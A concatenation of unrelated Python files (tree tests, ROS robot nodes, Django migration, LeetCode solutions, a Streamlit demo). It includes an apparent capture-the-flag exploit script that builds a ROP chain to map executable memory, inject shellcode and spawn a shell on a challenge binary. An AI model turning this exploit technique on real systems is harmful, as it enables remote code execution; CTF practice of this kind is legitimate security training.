    # bound method object to an int -- always True. Compare the actual count
    # against the number of unique keys inserted instead.
    assert redwood.count() == len(redlist)
    length_redlist = len(redlist)
    assert redwood._size == length_redlist
    for i in range(0, length_redlist):
        redwood.delete(redlist[i])
    assert redwood._size == 0
    ## was a FAIL...
    ## fixed. was removing the temp.left and temp.right
    ## only should remove the temp link that matched the (akey)
    ## that we want to delete.
    assert redwood.count() == redwood._size
    # Degenerate right-leaning tree (ascending inserts).
    rightsided = BinaryTree(5.5)
    righty = []
    for i in range(0, 50):
        rightsided.set(i, "slide to the right.")
        righty.append(i)
    assert len(righty) == rightsided._size
    for i in range(0, 50):
        rightsided.delete(i)
    assert rightsided._size == 0
    leftsided = BinaryTree(100.5)
    lefty = []
    for i in range(0, 50):
        leftsided.set(i, "slide to the left")
        lefty.append(i)
    assert len(lefty) == leftsided._size
    #### random leftsided rightsided
    for i in range(0, 50):
        x = randint(6, 50)
        rightsided.set(x, "one hop this time")
    righty2 = rightsided.make_key_list()
    assert len(righty2) == rightsided._size
    jump_jump = rightsided._size
    for i in range(0, jump_jump):
        x = righty2[i]
        rightsided.delete(x)
    assert rightsided._size == rightsided.count() == 0
    for i in range(0, 50):
        x = randint(0, 90)
        leftsided.set(x, "cha-cha now ya'all.")
    lefty2 = leftsided.make_key_list()
    assert len(lefty2) == leftsided._size
    cha_cha = leftsided._size
    for i in range(0, cha_cha):
        x = lefty2[i]
        leftsided.delete(x)
    assert leftsided._size == leftsided.count() == 0
    ### TEST A LARGE TREE ###
    rainforest = BinaryTree(500.5)
    for i in range(0, 1000):
        x = randint(0, 1000)
        rainforest.set(x, "oxygen")
    rainy = rainforest.make_key_list()
    assert len(rainy) == rainforest._size
    cha_cha = rainforest._size
    for i in range(0, cha_cha):
        x = rainy[i]
        rainforest.delete(x)
    assert rainforest._size == rainforest.count() == 0
def test_make_list():
    ''' make_key_list() returns every stored key, matching count() in length '''
    willow = BinaryTree(50.5)
    messy_tree = []
    ### willow, lopsidded
    for i in range(0, 50):
        willow.set(i, "weeping")
        messy_tree.append(i)
    will_list = willow.make_key_list()
    willow_size = willow.count()
    assert len(will_list) == willow_size
    # Same membership in both directions; ordering may legitimately differ.
    for i in range(0, 50):
        assert will_list[i] in messy_tree
    ## make_list_ appends from root.left, root.right down the branches
    ## the lists will have a different order, root.right will be second in the
    ## make_list, as it will most likely not be the second appended to manual list
    for i in range(0, 50):
        assert messy_tree[i] in will_list
    ## silver_spruce more even
    silver_spruce = BinaryTree(40.5)
    decor = []
    for i in range(0, 82):
        silver_spruce.set(i, 'firewood')
        decor.append(i)
    pine = silver_spruce.make_key_list()
    spruce_count = silver_spruce.count()
    assert len(pine) == spruce_count
    for i in range(0, 82):
        assert decor[i] in pine
    for i in range(0, 82):
        assert pine[i] in decor
    ### random made even tree
    apple = BinaryTree(30.5)
    pie = []
    for i in range(0, 40):
        x = randint(0, 62)
        apple.set(x, "buggy")
        pie.append(x)
    juice = apple.make_key_list()
    apple_size = apple.count()
    assert apple_size == len(juice)
    # pie may hold duplicates, so index only up to the tree's unique count.
    for i in range(0, apple_size):
        assert juice[i] in pie
        assert pie[i] in juice
def test_get():
    ''' get() returns the stored value for a key and None for missing keys '''
    # Keys in the original insertion order; the value for the i-th key
    # (1-based) is "spam<i>". Note -463 appears twice: the second set()
    # (spam38) overwrites the first (spam15), and the duplicate key is kept
    # in oaklist, exactly as the original sequence of calls did.
    keys = [-211, -739, -279, -417, -419, -969, -14, -715, -351, -349,
            -893, -672, -455, -21, -463, -321, -6, -741, -494, -595,
            -452, -36, -358, -796, -625, -61, -329, -35, -106, -393,
            -57, -314, -51, -62, -689, -366, -344, -463, -663, -318]
    oaktree = BinaryTree(-511.5)
    oaklist = []
    for i, key in enumerate(keys, start=1):
        oaktree.set(key, "spam" + str(i))
        oaklist.append(key)
    assert oaktree.get(-318) == "spam40"
    # A key that was never inserted yields None (fixed `== None` -> `is None`).
    assert oaktree.get(100) is None
    assert oaktree.get(-393) == "spam30"
    assert oaktree.get(-969) == "spam6"
    assert oaktree.get(-6) == "spam17"
    assert oaktree.get(-211) == "spam1"
    assert oaktree.get(-279) == "spam3"
    assert oaktree.get(-969) == "spam6"
    # Every inserted key must be retrievable.
    for akey in oaklist:
        assert oaktree.get(akey) is not None
    # Deleted keys become unreachable.
    oaktree.delete(-211)
    oaktree.delete(-739)
    assert oaktree.get(-211) is None
    assert oaktree.get(-739) is None
| 7,451 | 3,564 |
import keras.layers as KL
class BatchNorm(KL.BatchNormalization):
    """Batch Normalization class. Subclasses the Keras BN class and
    hardcodes training=False so the BN layer doesn't update
    during training.

    Batch normalization has a negative effect on training if batches are small
    so we disable it here.
    """
    def call(self, inputs, training=None):
        # Bug fix: super(self.__class__, self) resolves against the *runtime*
        # class, causing infinite recursion if this class is subclassed again.
        # Name the class explicitly.
        return super(BatchNorm, self).call(inputs, training=False)
import pytest
from utils import make_hash_sha256
# test_utils.py
def test_make_hash_sha256():
    """Structurally-equal inputs hash equally; changed keys or key order do not."""
    base = {'a': ['b', None, dict(c=dict(), d=(1, 2))], (3, 4): 'e'}
    duplicate = {'a': ['b', None, dict(c=dict(), d=(1, 2))], (3, 4): 'e'}
    renamed_key = {'b': ['b', None, dict(c=dict(), d=(1, 2))], (3, 4): 'e'}
    reordered = {(3, 4): 'e', 'b': ['b', None, dict(c=dict(), d=(1, 2))]}
    assert make_hash_sha256(base) == make_hash_sha256(duplicate)
    assert make_hash_sha256(duplicate) != make_hash_sha256(renamed_key)
    assert make_hash_sha256(renamed_key) != make_hash_sha256(reordered)
| 523 | 260 |
# Bot credentials -- fill in before running; keep real values out of version
# control. TOKEN/GUILD are presumably Discord bot settings -- confirm.
TOKEN = ""
GUILD = ""
# crypto bot
API_KEY_COINMARKETCAP = ""
# Generated by Django 3.1.4 on 2022-02-25 05:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Adds a nullable `organization` foreign key to the loans Product model."""

    dependencies = [
        ('organizations', '0002_organizationcustomer'),
        ('loans', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='product',
            name='organization',
            # SET_NULL + null=True: deleting an organization keeps its products.
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='organizations.organization'),
        ),
    ]
| 543 | 179 |
#!/usr/bin/env python2
"""
Run exploit locally with:
./solve.py
./solve.py REMOTE HOST=challenge.acictf.com PORT=45110
"""
import ast
import struct
import subprocess
from pwn import *
PROG_PATH = './challenge'
PROT_RWX = constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC
EGG_SIZE = 0x1000
def init_pwntools_context():
    """Point pwntools at the target binary, make logging verbose, and set
    the debugger terminal to a tmux split."""
    context.binary = PROG_PATH
    context.log_level = 'debug'
    context.terminal = ['tmux', 'vsplit', '-h']
def init_io():
    """Return a remote tube when REMOTE is set, else a local PTY-backed process."""
    if not args['REMOTE']:
        pty = process.PTY
        return process(PROG_PATH, stdin=pty, stdout=pty, stderr=pty)
    return remote(args['HOST'], int(args['PORT']))
def check_out(io, shelf_idx, backpack_idx):
    """Drive menu option 2: move the book at shelf_idx into backpack_idx."""
    for prompt, answer in (('\n\n', '2'),
                           ('book in?\n', str(shelf_idx)),
                           ('put the book?\n', str(backpack_idx))):
        io.sendlineafter(prompt, answer)
def leave(io):
    """Choose menu option 9 to exit the program's main loop."""
    io.sendlineafter("\n\n", "9")
def fill_choice_buffer(io, data):
    """Stash `data` in the program's title input buffer via menu option 1."""
    assert '\n' not in data  # a newline would terminate the input early
    for prompt, answer in (('\n\n', '1'), ('\n\n', '0'), ('Title?\n', data)):
        io.sendlineafter(prompt, answer)
class Addrs:
    # Fixed addresses inside the target binary (usable because the chain
    # below jumps to them directly; presumably non-PIE -- confirm).
    CHOICE_BUF = 0x603100  # buffer that fill_choice_buffer's data lands in -- confirm
    MMAP = 0x4008e0        # mmap entry used by the ROP chain -- presumably PLT stub
    READ = 0x400930        # read entry used by the ROP chain -- presumably PLT stub
def write_binary(io):
    """Receive the challenge ELF over the tube and save it as ./challenge."""
    # Wire format: 4-byte big-endian length prefix, then the raw ELF bytes.
    size = io.recvn(4)
    size = struct.unpack('>I', size)[0]
    log.info('Receiving ELF of size ' + str(size))
    elf = io.recvn(size)
    # Python 2 text mode: 'w' writes the byte string as-is.
    with open('challenge', 'w') as f:
        f.write(elf)
def get_gadget(ropper_out, target, bad_str='0a'):
    """Return the address (int) of the first gadget whose disassembly equals
    `target`, skipping addresses containing `bad_str` (e.g. a newline byte).

    Logs an error if no matching gadget is found.
    """
    for raw in ropper_out.splitlines():
        entry = raw.strip()
        if not entry.startswith('0x'):
            continue
        addr, instr = entry.split(': ')
        # Reject addresses containing the forbidden byte, and non-matches.
        if bad_str in addr or instr != target:
            continue
        return ast.literal_eval(addr)
    log.error('FAILED looking for: ' + target)
def get_gadgets():
    """Locate every ROP gadget the exploit needs in ./challenge via ropper."""
    raw_gadgets = subprocess.check_output('ropper --nocolor --file ./challenge', shell=True)
    wanted = [
        ('POP_RDI', 'pop rdi; ret;'),
        ('POP_RSI', 'pop rsi; ret;'),
        ('POP_RDX', 'pop rdx; ret;'),
        ('POP_R8_R9_RCX', 'pop r8; pop r9; pop rcx; ret;'),
        ('POP_RAX_R9_RCX', 'pop rax; pop r9; pop rcx; ret;'),
        ('POP_RSP', 'pop rsp; pop r13; pop r14; pop r15; ret;'),
    ]
    gadgets = {name: get_gadget(raw_gadgets, pattern) for name, pattern in wanted}
    # jmp-register gadgets require a separate ropper query.
    jmp_gadgets = subprocess.check_output('ropper --nocolor --file ./challenge --jmp rax', shell=True)
    gadgets['JMP_RAX'] = get_gadget(jmp_gadgets, 'jmp rax;')
    return gadgets
def win(io):
    """Exploit chain: ROP to mmap an RWX page, read shellcode into it from
    stdin, jump to it, then hand over an interactive shell."""
    if args['REMOTE']:
        write_binary(io)
    gadgets = get_gadgets()
    # Account for pop's from pivoted stack pointer.
    rop = 'A' * 0x18
    # NOTE(review): hard-coded target for the RWX mapping; MAP_FIXED below
    # forces mmap to honor it -- confirm it cannot collide with existing maps.
    mmap_addr = 0x7fe7a1e8f000
    # mmap(mmap_addr, EGG_SIZE, PROT_RWX, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0)
    rop += p64(gadgets['POP_RDI'])
    rop += p64(mmap_addr)
    rop += p64(gadgets['POP_RSI'])
    rop += p64(EGG_SIZE)
    rop += p64(gadgets['POP_RDX'])
    rop += p64(PROT_RWX)
    rop += p64(gadgets['POP_R8_R9_RCX'])
    rop += p64(0xffffffffffffffff) # 5th arg
    rop += p64(0) # 6th arg
    rop += p64(constants.MAP_PRIVATE | constants.MAP_FIXED | constants.MAP_ANON) # 4th arg
    rop += p64(Addrs.MMAP)
    # read(0, mmap_addr, EGG_SIZE): pull the shellcode egg from stdin.
    rop += p64(gadgets['POP_RDI'])
    rop += p64(0)
    rop += p64(gadgets['POP_RSI'])
    rop += p64(mmap_addr)
    rop += p64(gadgets['POP_RDX'])
    rop += p64(EGG_SIZE)
    rop += p64(Addrs.READ)
    # redirect execution into the freshly-written shellcode
    rop += p64(gadgets['POP_RAX_R9_RCX'])
    rop += p64(mmap_addr)
    rop += p64(0)
    rop += p64(0)
    rop += p64(gadgets['JMP_RAX'])
    fill_choice_buffer(io, rop)
    # stack pivot: point rsp at the choice buffer holding the ROP chain
    check_out(io, Addrs.CHOICE_BUF, -8)
    check_out(io, 0, -7)
    check_out(io, gadgets['POP_RSP'], -10)
    # final payload: /bin/sh shellcode padded to exactly EGG_SIZE bytes
    sc = asm(shellcraft.sh())
    assert len(sc) <= EGG_SIZE
    sc = sc + 'A' * (EGG_SIZE - len(sc))
    io.send(sc)
    io.interactive()
if __name__ == '__main__':
    init_pwntools_context()
    io = init_io()
    # PAUSE=1 lets you attach a debugger before the exploit fires.
    if args['PAUSE']:
        raw_input('PAUSED...')
    win(io)
| 4,026 | 1,787 |
#!/usr/bin/env python
# Test runner: invokes the Django test suite, defaulting to the
# `djsonb_fields` app when no test labels are given on the command line.
import os
import sys
import time
import django

# Make ./tests importable so its settings module can be loaded.
sys.path.insert(0, './tests')
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')

if __name__ == '__main__':
    from django.core.management import execute_from_command_line
    # `args` aliases sys.argv, so these inserts mutate sys.argv in place,
    # turning `./run.py [labels]` into `./run.py test [labels]`.
    args = sys.argv
    args.insert(1, 'test')
    if len(args) == 2:
        # No explicit labels supplied: test the djsonb_fields app.
        args.insert(2, 'djsonb_fields')
    execute_from_command_line(args)
from os import path
import csv
import json
import random

# Our dataset was created from http://www2.informatik.uni-freiburg.de/~cziegler/BX/
# and reduced down to 1,000 records.
# The CSV file has semicolon delimiters due to book titles containing commas.
SCRIPT_DIR = path.dirname(path.realpath(__file__)) + '/'
DB_FILE = SCRIPT_DIR + 'cscl_db.csv'
OUTPUT_FILE = SCRIPT_DIR + 'cscl_db.json'

# Original headers: "ISBN";"Book-Title";"Book-Author";"Year-Of-Publication";"Publisher";"Image-URL-S";"Image-URL-M";"Image-URL-L"
with open(DB_FILE, 'r') as file:
    # NOTE(review): passing explicit fieldnames means a header row, if the
    # CSV still has one, is parsed as a data record and the int() below
    # would raise — confirm the source file is header-less.
    reader = csv.DictReader(file,
                            delimiter=';',
                            fieldnames=[
                                'isbn', 'title', 'author', 'publication_year',
                                'publisher', 'image_url_s', 'image_url_m',
                                'image_url_l'
                            ])
    # Write one JSON object per line (JSON-lines format).
    with open(OUTPUT_FILE, 'w') as o_file:
        for line in reader:
            # Invent inventory numbers; available < copies always holds
            # because randrange excludes its upper bound.
            copies = random.randrange(1, 10)
            available = random.randrange(0, copies)
            line['copies'] = copies
            line['available'] = available
            # Convert publication_year from string to int
            line['publication_year'] = int(line['publication_year'])
            json.dump(line, o_file)
            o_file.write('\n')

print(
    '\n----------\nFinished converting {} from CSV to JSON.\nFile can be found at {}'
    .format(DB_FILE, OUTPUT_FILE))
from channels import route
from .features import consumers

# WebSocket endpoint for a single project's event stream.
path = r'^/api/projects/(?P<id>[0-9a-f-]+)/stream/$'

channel_routing = [
    route("websocket.connect", consumers.connect_to_project, path=path),
    # Bug fix: the disconnect handler was bound to "websocket.receive",
    # which removed clients on every inbound frame and left actual
    # disconnects unhandled.
    route("websocket.disconnect", consumers.disconnect_from_project, path=path)
]
| 286 | 98 |
#!/usr/bin/env python
# https://github.com/studioimaginaire/phue
import rospy
from geometry_msgs.msg import PoseStamped, Pose, Pose2D
from std_msgs.msg import String
import json
import io
import os
# pose = Pose value
# location = string value
class Location():
    """Bridge between named locations and robot poses.

    Loads a name -> pose dictionary from the JSON file named by the
    'locations_json' ROS parameter, lets callers record the current pose
    under a name, and converts published location names into Pose2D goals.
    """

    def __init__(self):
        self.PATH = rospy.get_param('locations_json')
        # Load the location data
        self.jsonCheck()
        self.load_dict()
        #self.write_dict()
        # Bug fix: state must exist before callbacks can fire, and loop()
        # blocks until shutdown, so initialise state first and loop last
        # (previously everything after loop() was unreachable).
        self.current_location = ''
        self.current_pose = Pose()
        self.current_goal = ''
        # Set up publishers
        self.pubCurrent = rospy.Publisher('hearts/navigation/pose/location', String, queue_size=10)
        self.pubGoal = rospy.Publisher('/hearts/navigation/goal', Pose2D, queue_size=10)
        rospy.Subscriber("/record_Location", String, self.recordLocation_callback)
        rospy.Subscriber("/go_To_Location", String, self.goToLocation_callback)
        # rospy.Subscriber("/clicked_point", PointStamped, self.clicked_callback)
        rospy.Subscriber("hearts/navigation/goal/location", String, self.locGoal_callback)
        rospy.Subscriber("move_base_simple/current_pose", Pose, self.currentPose_callback)
        self.find_current_location()
        self.loop()

    def load_dict(self):
        """Load the name -> pose dictionary from the locations JSON file."""
        json_name = rospy.get_param('locations_json')
        with open(json_name) as json_data:
            self.dict = json.load(json_data)
        rospy.loginfo("using locations file: " + json_name)

    def write_dict(self, updatedLocations):
        """Persist the given locations dictionary to the JSON file."""
        json_name = rospy.get_param('locations_json')
        # Bug fix: previously opened the undefined name `json_file` and
        # passed that same undefined name to json.dump instead of the
        # open file handle.
        with open(json_name, "w") as json_file:
            json.dump(updatedLocations, json_file)

    def jsonCheck(self):
        """Return 1 if the locations file exists and is readable, else 0."""
        if os.path.isfile(self.PATH) and os.access(self.PATH, os.R_OK):
            print("File exists and is readable")
            return 1
        else:
            return 0

    def recordLocation_callback(self, data):
        """Store the current pose in the locations file under the given name."""
        # Bug fix: key on the string payload (data.data); the message object
        # itself is not JSON-serialisable. Also Pose exposes .position, not
        # .point, so read position.x / position.y.
        p = {
            data.data: {
                "header": {
                    "seq": 0,
                    "stamp": {
                        "secs": 0,
                        "nsecs": 0
                    },
                    "frame_id": "/map"
                },
                "pose": {
                    "position": {
                        "x": self.current_pose.position.x,
                        "y": self.current_pose.position.y,
                        "z": 0
                    },
                    "orientation": {
                        "x": 0,
                        "y": 0,
                        "z": 0,
                        "w": 0
                    }
                }
            }
        }
        if self.jsonCheck() == 1:
            self.load_dict()
            LocationsCurrent = self.dict
            LocationsCurrent.update(p)
        else:
            # File missing: seed it with an empty object, then our entry.
            with io.open(self.PATH, 'w') as db_file:
                db_file.write(unicode(json.dumps({})))
            LocationsCurrent = p
        self.write_dict(LocationsCurrent)

    def goToLocation_callback(self, data):
        """Publish the pose stored under the requested location name."""
        # Bug fix: previously published the undefined name `pose`, and
        # looked the pose up with the message object instead of its string.
        goal_location = self.find_pose(data.data)
        if goal_location is not None:
            self.pubGoal.publish(goal_location)

    # When a location is published, turn it in to a pose goal
    def locGoal_callback(self, data):
        print(data.data)
        pose = self.find_pose(data.data)
        if not pose is None:
            self.current_goal = data.data
            self.pubGoal.publish(pose)
        else:
            self.current_goal = None
            print("invalid goal location '" + data.data + "'")

    # When a pose is published, convert it to a location value
    def currentPose_callback(self, data):
        # Bug fix: this callback receives a Pose message, which has no
        # .data attribute — the message itself is the pose.
        print(data)
        self.current_pose = data
        self.pubCurrent.publish(self.find_current_location())

    # Get the pose values from the location dict
    def find_pose(self, location_name):
        """Return a Pose2D for the named location, or None if unknown."""
        # NOTE(review): this reads flat x/y/theta keys while
        # recordLocation_callback writes a nested header/pose structure —
        # confirm which schema the JSON file actually uses.
        try:
            print(self.dict[location_name])
            goal = Pose2D()
            goal.x = self.dict[location_name]["x"]
            goal.y = self.dict[location_name]["y"]
            goal.theta = self.dict[location_name]["theta"]
            return goal
        except:
            return None

    # Get the location value from the Pose lookup
    def find_current_location(self):
        """Return the name whose stored x/y exactly match the current pose."""
        currentPose = self.current_pose
        location = ''
        for i in self.dict:
            if (self.dict[i]["x"] == currentPose.position.x and self.dict[i]["y"] == currentPose.position.y):
                location = i
        return location

    # loop
    def loop(self):
        """Block until ROS shutdown, ticking at 1 Hz."""
        rate = rospy.Rate(1)
        while not rospy.is_shutdown():
            rate.sleep()
if __name__ == '__main__':
    rospy.init_node("task_controller", anonymous=True)
    loc = Location()
    # NOTE(review): Location.__init__ already blocks in its own loop()
    # until shutdown, so this spin() is effectively unreachable — confirm.
    rospy.spin()
| 4,923 | 1,485 |
#!/usr/bin/env python
"""
Node to convert joystick commands to kinova arm cartesian movements
"""
import rospy
from sensor_msgs.msg import Joy
#from geometry_msgs.msg import Pose
from kortex_driver.msg import TwistCommand, Finger, Empty, Pose
from kortex_driver.srv import SendGripperCommand, SendGripperCommandRequest, GetMeasuredCartesianPose, GetMeasuredCartesianPoseResponse
# Teleop tuning constants.
max_linear_speed = 0.1   # cap for cartesian translation commands
max_angular_speed = 0.4  # cap for rotation commands
gripper_speed = 0.05     # finger speed used for gripper open/close
cartesian_min_limit_x = 0.3  # minimum x enforced when restricted_mode is on
# The three values below are defaults; joy_listener() overwrites them from
# the ~restricted_mode / ~joy_topic / ~arm_ns private parameters.
restricted_mode = False
joy_topic = "joy"
arm_ns = ""
def joy_listener():
    """Initialise the teleop node, read its parameters and listen for joystick input."""
    # start node
    rospy.init_node("kinova_joy_teleop")

    # Pull configuration from private parameters into the module globals
    # that joy_cmd_callback reads.
    global restricted_mode, arm_ns, joy_topic
    restricted_mode = rospy.get_param("~restricted_mode", False)
    arm_ns = rospy.get_param("~arm_ns", "")
    joy_topic = rospy.get_param("~joy_topic", "joy")
    rospy.loginfo("restricted mode: " + str(restricted_mode))

    # Forward each joystick message to the command callback.
    rospy.Subscriber(joy_topic, Joy, joy_cmd_callback, queue_size=1)

    # Keep the node alive until it is stopped.
    rospy.spin()
def joy_cmd_callback(data):
    """Translate one Joy message into a cartesian twist and gripper command.

    Deadman logic: axes[5]/buttons[5] enable linear control, axes[2] enables
    angular control (non-restricted only); buttons[0]/[1] drive the gripper.
    NOTE(review): the exact axis/button mapping depends on the joystick —
    confirm against the hardware.
    """
    # start publisher (re-created per callback; relies on rospy caching)
    pub = rospy.Publisher(arm_ns + "/in/cartesian_velocity", TwistCommand, queue_size=1)
    # twist command to be filled in below
    cmd = TwistCommand()
    if ((data.axes[5] < 0 or data.buttons[5] == 1) and data.buttons[4] != 1):
        pose_srv = rospy.ServiceProxy(arm_ns + "/base/get_measured_cartesian_pose", GetMeasuredCartesianPose)
        cmd.twist.linear_x = data.axes[1] * max_linear_speed
        if (restricted_mode and data.axes[1] < 0):
            # Moving toward the operator: query the arm pose and refuse to
            # go below the configured x limit.
            try:
                # Default response first so `pose` is defined even if the
                # service call below raises.
                pose = GetMeasuredCartesianPoseResponse()
                pose = pose_srv(Empty())
                #rospy.loginfo("Kinova x position: %f")
            except rospy.ServiceException as e:
                rospy.loginfo("cartesian pose request failed")
            if (pose.output.x < cartesian_min_limit_x):
                cmd.twist.linear_x = 0
        cmd.twist.linear_y = data.axes[0] * max_linear_speed
        cmd.twist.linear_z = data.axes[4] * max_linear_speed
        cmd.twist.angular_z = -data.axes[3] * max_angular_speed
        rospy.loginfo("linear velocities: {%f, %f, %f};", cmd.twist.linear_x, cmd.twist.linear_y, cmd.twist.linear_z)
    elif (not restricted_mode and data.axes[2] < 0):
        # Angular mode: same sticks drive rotation instead of translation.
        cmd.twist.angular_x = data.axes[1] * max_angular_speed
        cmd.twist.angular_y = -data.axes[0] * max_angular_speed
        cmd.twist.angular_z = -data.axes[3] * max_angular_speed
        rospy.loginfo("angular velocities: {%f, %f, %f};", cmd.twist.angular_x, cmd.twist.angular_y, cmd.twist.angular_z)
    if (data.buttons[0] == 1 or data.buttons[1] == 1):
        # Gripper: button 0 closes (negative speed), button 1 opens.
        cmd_gripper_req = SendGripperCommandRequest()
        cmd_gripper_req.input.mode = 2  # speed mode
        fingey = Finger()
        gripper_dir = -1 if data.buttons[0] == 1 else 1
        fingey.value = gripper_dir*gripper_speed
        cmd_gripper_req.input.gripper.finger.append(fingey)
        try:
            cmd_gripper_srv = rospy.ServiceProxy(arm_ns + "/base/send_gripper_command", SendGripperCommand)
            cmd_gripper_srv(cmd_gripper_req)
        except rospy.ServiceException as e:
            rospy.loginfo(cmd_gripper_req)
            rospy.loginfo("joystick gripper command failed")
    # publish the twist command (zero twist when no deadman is held)
    pub.publish(cmd)
if __name__ == '__main__':
    # Run the listener; swallow the interrupt raised on node shutdown.
    try:
        joy_listener()
    except rospy.ROSInterruptException:
        pass
| 3,471 | 1,281 |
# Silly sentence generator:
#   "<expletive> Erwin, ich bin <job> und nicht <job>!"
# Bug fix: `choice` was used without ever being imported (NameError).
from random import choice

kraftausdruecke = [
    "Mist",
    "Verdammt",
    "Mannmannmann",
    "Herrgottnochmal",
    "Echt jetzt",
    "Zum Teufel"
]

# Bug fix: the umlauts below were mojibake (e.g. "Baggerfรผhrer").
berufe = [
    "Baggerführer",
    "Velokurier",
    "Tierärztin",
    "Verkehrspolizist",
    "Schreinerin",
    "Apotheker",
    "Komponist",
    "Physikerin",
    "Buchhändlerin"
]

# Pick a random expletive.
a = choice(kraftausdruecke)
# Pick a random job, find its index, and pop it from the list so it
# can't be picked again.
b = berufe.pop(berufe.index(choice(berufe)))
# Pick a second job — necessarily different, since b was removed.
c = choice(berufe)
print(a, "Erwin" + ",", "ich bin", b, "und nicht", c + "!")
| 576 | 242 |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    """Return one representative root per duplicated subtree structure."""

    def findDuplicateSubtrees(self, root: TreeNode) -> List[TreeNode]:
        seen = set()      # serialisations encountered at least once
        reported = set()  # serialisations already added to the result
        result = []

        def serialize(node):
            """Post-order serialise the subtree rooted at `node`, collecting
            duplicates as they are discovered during the traversal."""
            if not node:
                return ""
            encoding = "{}({})({})".format(
                node.val, serialize(node.left), serialize(node.right))
            if encoding in seen:
                # Second (or later) sighting: report once per structure.
                if encoding not in reported:
                    reported.add(encoding)
                    result.append(node)
            else:
                seen.add(encoding)
            return encoding

        serialize(root)
        return result
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class SolutionCount:
    """Counter-based variant: one dict of occurrence counts replaces the
    two sets used by Solution."""

    def findDuplicateSubtrees(self, root: TreeNode) -> List[TreeNode]:
        # Bug fix: defaultdict was used without being imported anywhere in
        # this file, raising NameError at call time.
        from collections import defaultdict

        # node_str -> number of times that serialisation has been seen
        node_str_count = defaultdict(int)
        duplicated_nodes = list()

        def node2str(node):
            """
            this function accomplishes two tasks:
            - index each node into a string
            - search the duplicated nodes during the traversal
            """
            if node is None:
                return ""
            node_str = "{}({})({})".format(
                node.val, node2str(node.left), node2str(node.right))
            node_str_count[node_str] += 1
            # Append exactly once, on the second sighting.
            if node_str_count[node_str] == 2:
                duplicated_nodes.append(node)
            return node_str

        node2str(root)
        return duplicated_nodes
| 2,429 | 683 |
import streamlit as st
from PIL import Image
import cv2
import numpy as np
from sklearn import datasets
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
st.title("Streamlit Demo App")
st.write("""
# Explorling different classifier on different datasets
""")
dataset_name= st.selectbox("Select Dataset",("","IRIS","BreastCancer","WineDataset"))
if dataset_name!="":
classifier_name=st.selectbox("Select Classifier",("","KNN","RandomForest","SVM"))
if classifier_name!="":
def get_dataset(dataset_name):
if dataset_name=="IRIS":
data=datasets.load_iris()
elif dataset_name=="BreastCancer":
data=datasets.load_breast_cancer()
else:
data=datasets.load_wine()
X=data.data
y=data.target
return X,y
X,y=get_dataset(dataset_name)
st.write("Shape of the dataset",X.shape)
st.write("Number of classes",len(np.unique(y)))
        def add_parameter_ui(clf_name):
            """Render the hyper-parameter sliders for the chosen classifier
            and return the selected values as a dict."""
            params=dict()
            if clf_name=="KNN":
                # number of neighbours
                K=st.slider("K",1,15)
                params["K"]=K
            elif clf_name=="SVM":
                # regularisation strength
                C=st.slider("C",0.01,10.0)
                params['C']=C
            else:
                # RandomForest hyper-parameters
                max_depth=st.slider("max_depth",2,15)
                n_estimators=st.slider("n_estimators",1,100)
                params["max_depth"]=max_depth
                params["n_estimators"]=n_estimators
            return params
params=add_parameter_ui(classifier_name)
def get_classifier(clf_name,params):
if clf_name=="KNN":
clf=KNeighborsClassifier(n_neighbors=params["K"])
elif clf_name=="SVM":
clf=SVC(C=params["C"])
else:
clf=RandomForestClassifier(n_estimators=params["n_estimators"],max_depth=params["max_depth"],random_state=42)
return clf
clf=get_classifier(classifier_name,params)
#Classification
X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=42)
clf.fit(X_train,y_train)
y_pred=clf.predict(X_test)
acc=accuracy_score(y_pred,y_test)
st.write("Classifier = ",classifier_name)
st.write("Accuracy = ",np.round(acc*100,2),"%")
pca=PCA(2)
X_projected=pca.fit_transform(X)
x1=X_projected[:,0]
x2=X_projected[:,1]
fig=plt.figure()
plt.scatter(x1,x2,c=y,alpha=0.8,cmap='viridis')
plt.xlabel("Principal Component 1")
plt.ylabel("Principal Component 2")
plt.colorbar()
st.pyplot(fig)
# def load_image(image_file):
# img = Image.open(image_file)
# return img
#
# image_file = st.file_uploader("Upload Image",type=['png','jpeg','jpg'])
# if image_file is not None:
# file_details = {"Filename":image_file.name,"FileType":image_file.type,"FileSize":image_file.size}
# st.write(file_details)
#
# img = load_image(image_file)
# st.image(img,width=250,height=250)
# image_array=np.asarray(img)
# st.image(image_array,width=100,height=100)
| 3,391 | 1,170 |
"""
python3 detect.py \
--model ${TEST_DATA}/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite
"""
import argparse
import os
import numpy as np
import tensorflow as tf
import numpy as np
import PIL
import matplotlib.pyplot as plt
import matplotlib.image as matimage
class ConvolutionalAutoencoder(tf.keras.models.Model):
    """Small convolutional autoencoder for 128x128 RGB images.

    NOTE(review): the decoder upsamples x2 and then applies a stride-2
    convolution, which cancel out — the output is 32x32x3 for a 128x128x3
    input, i.e. a "pixelated" image rather than a full reconstruction.
    Confirm that this is the intended effect.
    """

    def __init__(self):
        super(ConvolutionalAutoencoder,self).__init__()
        self.encoder_input_shape = (128,128,3)
        # Encoder: 128 -> 64 -> 32 spatial, down to 3 feature channels.
        self.encoder = tf.keras.models.Sequential([
            tf.keras.layers.Input(shape= self.encoder_input_shape),
            tf.keras.layers.Conv2D(16, (3,3), activation='relu', padding='same'),
            tf.keras.layers.MaxPooling2D(2,2),
            tf.keras.layers.Conv2D(8, (3,3), activation='relu', padding='same'),
            tf.keras.layers.MaxPooling2D(2,2),
            tf.keras.layers.Conv2D(3, (3,3), activation='relu', padding='same'),
        ])
        # Decoder: sigmoid keeps the output in [0, 1] like the scaled input.
        self.decoder = tf.keras.Sequential([
            # Upsample its input
            tf.keras.layers.UpSampling2D((2, 2)),
